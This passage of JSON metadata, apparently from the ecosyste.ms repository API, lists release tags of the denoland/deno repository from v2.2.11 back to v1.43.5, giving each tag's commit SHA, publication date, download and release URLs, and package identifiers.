ependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.m